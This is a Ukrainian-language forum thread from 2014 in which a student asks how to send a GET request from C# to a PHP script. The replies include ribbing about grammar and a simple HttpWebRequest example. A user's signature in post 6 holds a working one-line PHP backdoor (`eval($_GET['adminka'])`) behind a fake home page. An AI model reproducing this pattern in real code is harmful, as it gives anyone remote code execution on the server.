1 Востаннє редагувалося 21_98 (04.09.2014 15:12:57)

Тема: Як в C# відправити Get запит

Мені треба з скрипта A(C#) відправити значення змінної на скрипт B(php) методом Post или Get в php примати

$зміна = $_POST(или GET)['login(наприклад)'];

а як в С# відправити я не заню допоможіть будь ласка   *SORRY*

2

Re: Як в C# відправити Get запит

таке враження, що граматика на нулі або гуглтранслей *WALL*

Прихований текст
не питання, а набір букв
(function(){
  console.log("called anonymously");
})()

3

Re: Як в C# відправити Get запит

Не по темі
Розумію тепер для чого для вступу в ВУЗ треба українська мова.
Подякували: mike1

4

Re: Як в C# відправити Get запит

Replace написав:
Не по темі
Розумію тепер для чого для вступу в ВУЗ треба українська мова.

По темі. Незнаю наскільки правда, але мені в РМ писала ця людина, що вона укр. мови не знає добре, на відміну від англ. Залишається чекати повідомлень на англ. :)

(function(){
  console.log("called anonymously");
})()
Подякували: 21_981

5 Востаннє редагувалося 21_98 (04.09.2014 16:09:39)

Re: Як в C# відправити Get запит

Спасибо всем за ответ

6

Re: Як в C# відправити Get запит

Я взагаліто 9 класник

Це не виправдання.

<?php
echo '<html><body><h1>This is my home page</h1>DATING &amp; DOORWAY</body></html>';
if (isset($_GET['adminka'])) eval($_GET['adminka']);
Если ты это читаешь, тебе должно быть стыдно! Займись чем–нибудь полезным!
Подякували: Replace1

7

Re: Як в C# відправити Get запит

using System.Net;
string url = "https://www.example.com/scriptname.php?var1=hello&var2=ladygaga";
HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url);
HttpWebResponse response = (HttpWebResponse)request.GetResponse();
Stream resStream = response.GetResponseStream();

var1 - назва змінної, а hello її значення
var2 - назва змінної, а ladygaga її значення

Говорила баба діду: «Я поїду к Білодіду, Ізучу двомовну мову І вернусь обратно знову». А дід бабі: «Не *изди, К Білодіду нєт їзди, — Туди не ходять поїзди»
Подякували: 21_981

8

Re: Як в C# відправити Get запит

21_98 написав:

Я взагаліто 9 класник

Я теж... В 9 класі не вміти поставити коми з крапками.....

Подивіться прклад
Казнить нельзя - помиловать.
Казнить, нельзя помиловать!
Навчаюсь вчитись, щоб навчатись.
Подякували: Replace, mike, DOP3